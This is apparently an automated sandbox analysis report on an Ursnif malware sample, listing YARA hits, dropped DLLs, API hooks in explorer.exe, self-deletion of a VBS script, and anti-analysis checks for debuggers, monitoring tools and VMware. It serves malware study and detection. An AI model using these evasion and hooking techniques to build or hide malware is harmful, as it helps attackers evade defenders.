Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\marginal.roq

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\2q4tlha5wbo1.vbs

Jump to behavior

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

WScript reads language and country specific registry keys (likely country aware script)

Show sources

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3488			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1819			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 6024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWpn
Source: RuntimeBroker.exe, 0000001F.00000000.810750161.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000020.00000002.912551846.000001B4F862A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
